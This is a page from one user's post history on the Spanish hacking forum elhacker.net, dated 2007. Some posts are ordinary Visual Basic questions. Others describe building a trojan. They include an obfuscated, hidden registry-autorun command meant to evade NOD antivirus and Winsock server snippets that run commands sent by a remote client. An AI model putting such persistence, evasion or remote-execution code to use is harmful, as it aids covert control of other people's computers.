elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25
221  Programación / Programación Visual Basic / Re: [+] Programazo: Code Advisor 6.0 en: 14 Junio 2007, 14:17 pm
el enlace funciona, de exo me lo acabo de bajar pa ra probarlo, que siendo inexperto en el vb seguro que me ayuda mucho.

aora me estoy bajando el service pack 6 y lo probare.
222  Programación / Programación Visual Basic / Re: Borrar de un texbox en: 7 Junio 2007, 22:28 pm
Muxas gracias eso es lo que buscaba.

223  Programación / Programación Visual Basic / Re: Borrar de un texbox en: 7 Junio 2007, 21:51 pm
ok muxas gracias aora a ver si consigo acer que no me borre todos lo guiones, si no el ultimo solo.
PE, lalal-lelelel-lilili

que solo me borre el lilili y se kede en llalala-lelele

es que es para acer el boton de atras en mi file manager, y no se me ocurre otra cosa que cada vez que se pulse el boton borreasta el ultimo \

voy a seguir intentando, pero  si me exais una mantia mejor

Gracias
224  Programación / Programación Visual Basic / Borrar de un texbox en: 7 Junio 2007, 21:30 pm
wenas, os quiero acer una preguntilla, como puedo borrar desde codigo el contenido de un texbox asta un caracter deeterminado?

por ejemplo si en un texbox tegno lalalal-lalalkekkeke

pues al darle al boton me borre asta el guion, kedando solo lalalal

o si me decis de que manera puedo buscarlo ya me apaño yo, pero es que no se como buscarlo

gracias
225  Programación / Programación Visual Basic / no me cierra el cmd en: 31 Mayo 2007, 21:57 pm
wenas, os comento, en mi troyano la unica forma de que el nod no me lo detecte al agregarlo al registro es esta:

Citar
reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}'j{mjtvu'6{'YLNfZa'6k',~pukpy,cZ€z{lt:9cj{mjtvu5ll")
Shell "cmd.exe /c " & reg & "" & vbCrLf & "y", vbHide

el problema esta en que si la calve existe se queda el proceso del cmd corriendo, ya que pide confirmacion Y/N y se que da ay el proceso. mi duda es de que manera puedo hacer que compruebe si existe esa clave o que cuando pida confirmacion Y/N mande una Y por si acaso.

Gracias.
226  Programación / Programación Visual Basic / Re: una manita porfa a este codigo (me da error) en: 27 Mayo 2007, 16:09 pm
weno pos el codigo de xenon es este:

Private Sub WS_DataArrival(ByVal bytesTotal As Long)                        'en la llegada de datos
On Error GoTo Error
dim datos as string
ws.getdata datos          'metemos en la variable datos los datos que nos lleguen
if datos = "paint" then shell ("mspaint")                    ' si los datos eran = a "paint" entonces ejecuta el paint
end sub

creo que el problema que tienes es que te falta definir el error.

antes del "end sub" pon error:

creo que ese es el problema que te sale, o tb e seguido ese manual para acer mi primer troyano, pero lo e dejado y me e metido en el de kizar de multi conexsion inversa, que me esta quedando muy mono.

Por cierto, alguien sabe que pasa con la pag de kizar? gracias

227  Programación / Programación Visual Basic / Re: Como añadir un recurso (un ocx..) a nuestra aplicacion y extraerlo a System en: 26 Mayo 2007, 15:57 pm
weno pos yo tengo un problema al crear el recurso.

lo que ago es esto, que no se si lo e entendido bien:

creo un nuevo doc de texto y lo renombro a *.res
abro el reshack y le doy a añadir resource. selecciono el ocx y en la primera casilla pongo BINARY y en la segunda 101.

lo guardo y al darle a agregar archivo en el vb me dice que no es un archivo de recurso valido o algo asi. que ago mal?
228  Programación / Programación Visual Basic / Re: ejecutar archivos remotos en: 24 Mayo 2007, 22:45 pm
ok gracias, voy a probar a ver si de esa manera funciona.


gracias
229  Programación / Programación Visual Basic / ejecutar archivos remotos en: 24 Mayo 2007, 22:21 pm
wenas, estoy intentando acer un troyano (el primero que ago) y a la vez intento aprender sobre el winsock. para mi el mejor manual es la practica con un poco de teoria.

weno pos os comecto. la manera que ago yo para enviar comandos es la siguiente:

en el cliente:

Private Sub cmdAbrir_click()
ws.sendata "abrircd"
End Sub

en el server:

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo error
Dim datos As String
ws.GetData datos
If datos = "abrircd" Then ret = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub

Esta es la manera que uso yo para enviar comandos, se que no es la mejor, pero DE MOMENTO a mi me sirve asi.

aora la pregunta es como enviar al servidor el contenido de un textbox y que el servidor ejecute el programa que ay en ese textbox.

en el cliente supongo que seria algo asi:

ws.sendata Text2.text

pero en el servidor no se como acer para que me muestre el contenido del textbox. con eso yo ya sabria apañarme. si podeis ponerme algun enlace o algo que me explique un poco como acer eso os lo agradecere un monton.

gracias
230  Programación / Programación Visual Basic / Re: Mi "troyano" en: 21 Mayo 2007, 14:58 pm
tiene wena pinta, pero a mi tambien me tira error.

si lo ejecuto desde vb me tira el error 5 en tiempo de ejecucion, correspondiente linea:

Shell WINDOWS & "\klass.exe"
en el server en el formload.

si lo compilo y lo ejecuto me tira un error win32 no valida. usease que algo ta mal.

yo aun no tengo conocimiento suficiente para averiguar lo que ocurre, pero voy a intentar descubrirlo.

gracias, y tiene wena pinta el troyanito
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines